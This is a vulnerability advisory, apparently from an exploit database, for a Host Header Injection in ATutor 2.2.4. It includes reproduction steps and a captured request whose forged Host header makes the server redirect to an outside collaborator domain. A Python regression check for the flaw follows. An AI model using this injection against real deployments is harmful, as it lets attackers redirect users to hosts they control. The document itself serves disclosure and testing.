## https://sploitus.com/exploit?id=PACKETSTORM:188885
# Exploit Title: Host Header Injection - atutorv2.2.4
    # Date: 01/2025
    # Exploit Author: Andrey Stoykov
    # Version: 2.2.4
    # Tested on: Ubuntu 22.04
    # Blog: https://msecureltd.blogspot.com/2025/01/friday-fun-pentest-series-18-host.html
    
    Description:
    
    - The application has a Host Header Injection vulnerability: the value
    of the request's Host header is used to build the redirect URL returned
    in the Location header.
    
    
    Host Header Injection #1:
    
    Steps to Reproduce:
    
    1. Visit a specific page of the application
    2. Intercept the HTTP GET/POST request
    3. Modify the Host header to a domain of the attacker's choice
    4. Forward the HTTP request
    
    // HTTP GET request
    
    GET /atutor/bounce.php?course=0 HTTP/1.1
    Host: yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: http://192.168.1.110/atutor/login.php
    Connection: keep-alive
    Cookie: ATutorID=oukcasgb86k60mefasc36joje4; flash=no
    Upgrade-Insecure-Requests: 1
    Priority: u=0, i
    
    
    // HTTP response
    
    HTTP/1.1 302 Found
    Date: Thu, 09 Jan 2025 18:55:35 GMT
    Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
    X-Powered-By: PHP/5.6.40
    Set-Cookie: ATutorID=nl8ahpeo2tsd0mc4d2a0br4a94; path=/atutor/; HttpOnly
    Set-Cookie: ATutorID=nl8ahpeo2tsd0mc4d2a0br4a94; path=/atutor/; HttpOnly
    Set-Cookie: flash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
    Set-Cookie: nexthelp_cookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Location: http://yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com/atutor/login.php
    Vary: Accept-Encoding
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
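
A regression check for the behaviour shown above, as an added example that is not part of the original advisory: it parses a captured request/response pair and reports whether the host in the redirect's Location header came from the request's Host header. The trusted host set, the function names and the sample messages are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumption: hostnames this deployment is legitimately served under.
TRUSTED_HOSTS = {"192.168.1.110"}

# Constructed samples, trimmed to the headers that matter in the capture above.
SAMPLE_REQUEST = """GET /atutor/bounce.php?course=0 HTTP/1.1
Host: untrusted.example
Referer: http://192.168.1.110/atutor/login.php
"""
SAMPLE_RESPONSE = """HTTP/1.1 302 Found
Location: http://untrusted.example/atutor/login.php
Content-Length: 0
"""

def parse_headers(raw):
    """Return {lower-case name: [values]} for a raw HTTP message, skipping the start line."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:
        if not line.strip():
            break  # a blank line ends the header section
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers

def host_of(value, is_url):
    """Lower-cased hostname without port, from a URL or from a Host header value."""
    parts = urlsplit(value if is_url else "//" + value)
    return (parts.hostname or "").lower()

def check_redirect(raw_request, raw_response, trusted=TRUSTED_HOSTS):
    """Classify the pair as 'reflected-host', 'untrusted-redirect' or 'ok'."""
    req, resp = parse_headers(raw_request), parse_headers(raw_response)
    sent = host_of(req.get("host", [""])[0], is_url=False)
    for location in resp.get("location", []):
        dest = host_of(location, is_url=True)
        if not dest or dest in trusted:
            continue  # relative redirect, or an absolute one to a canonical host
        # An absolute redirect to a host outside the allowlist is a finding;
        # matching the request's Host header shows where the value came from.
        return "reflected-host" if dest == sent else "untrusted-redirect"
    return "ok"
```

Run against a patched deployment, the same request should produce `ok`, because the Location header is then built from a configured canonical host or is relative.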